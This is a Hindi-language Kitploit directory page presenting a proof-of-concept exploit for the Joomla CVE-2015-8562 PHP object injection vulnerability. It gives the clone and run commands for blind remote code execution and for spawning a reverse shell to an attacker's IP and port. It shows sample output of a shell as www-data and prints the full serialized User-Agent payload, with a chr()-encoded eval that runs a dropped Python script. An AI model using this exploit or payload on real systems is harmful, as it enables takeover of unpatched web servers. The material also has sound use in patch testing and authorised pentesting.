Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Joomla_CVE-2015-8562 — Joomla की CVE-2015-8562 भेद्यता (Object Injection RCE) के लिए एक प्रूफ ऑफ कॉन्सेप्ट | Kitploit
उपकरण/GitHubGitHub/voidsec/joomla_cve-2015-8562
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubvoidsec/joomla_cve-2015-8562

Joomla_CVE-2015-8562

Joomla की CVE-2015-8562 भेद्यता (Object Injection RCE) के लिए एक प्रूफ ऑफ कॉन्सेप्ट

रिपॉजिटरी देखें
1186 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

Joomla_CVE-2015-8562

Joomla की CVE-2015-8562 कमज़ोरी (ऑब्जेक्ट इंजेक्शन RCE) के लिए एक प्रूफ ऑफ कॉन्सेप्ट

परिचय/चेंजलॉग

यह PoC exploit-db पर होस्ट किए गए इम्प्लीमेंटेशन का दूसरा संस्करण है।

root@kitploit:~
-Fixed (regenerate session)
-Added the option to switch from X-Forwarded-For to User-Agent method
-Added the option to switch from a python reverse shell to a bash one
-Added catching exception for missing http schema and script termination
-Edited for a better usage, better messages and colors
-TODO: adding msf support

उपयोग कैसे करें

root@kitploit:~
git clone https://github.com/VoidSec/Joomla_CVE-2015-8562.git
cd Joomla_CVE-2015-8562

ब्लाइंड RCE:

root@kitploit:~
python joomla-cve-2015-8562.py -t http://<target_ip>/ --cmd
$ touch /tmp/test

रिवर्स शेल स्पॉन करें:

root@kitploit:~
python joomla-cve-2015-8562.py -t http://<target_ip>/ -l <local_ip> -p <local_port>
[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://<target_ip>/
[-] Uploading python reverse shell
<Response [200]>
[+] Spawning reverse shell....
<Response [200]>
Listening on [0.0.0.0] (family 0, port 1337)
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

CVE-2015-8562

दिसंबर 2015 में Joomla में एक नई कमज़ोरी खोजी गई। यह एक रिमोट हमलावर को PHP ऑब्जेक्ट इंजेक्शन हमलों का शोषण करने और HTTP User-Agent हेडर के माध्यम से मनमाना PHP कोड निष्पादित करने की अनुमति देती है।

यह कमज़ोरी Joomla 1.5.0 से 3.4.5 तक तथा PHP संस्करण 5.4.45 से पहले (5.3.x सहित), 5.5.29 या 5.6.13 को प्रभावित करती है CVE-2015-6835।

मैंने इस कमज़ोरी की व्याख्या करते हुए यह ब्लॉग पोस्ट लिखा है।

भेजा गया हेडर कुछ इस प्रकार दिखता है

root@kitploit:~
}__test|O:21:"JDatabaseDriverMysqli":3:{
	s:2:"fc";
	O:17:"JSimplepieFactory":0:{}
	s:21:"\0\0\0disconnectHandlers";
	a:1:{
		i:0;
		a:2:{
			i:0;
			O:9:"SimplePie":5:{
				s:8:"sanitize";
				O:20:"JDatabaseDriverMysql":0:{}
				s:8:"feed_url";
				s:305:"eval(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(112).chr(121).chr(116).chr(104).chr(111).chr(110).chr(32).chr(47).chr(116).chr(109).chr(112).chr(47).chr(76).chr(56).chr(51).chr(55).chr(66).chr(72).chr(46).chr(112).chr(121).chr(39).chr(41).chr(59));
				JFactory::getConfig();
				exit";
				s:19:"cache_name_function";
				s:6:"assert";
				s:5:"cache";
				b:1;s:11:"cache_class";
				O:20:"JDatabaseDriverMysql":0:{}
				}
			i:1;
			s:4:"init";
			}
		}
	s:13:"\0\0\0connection";
	b:1;
}ýýýý
टूल डाउनलोड करें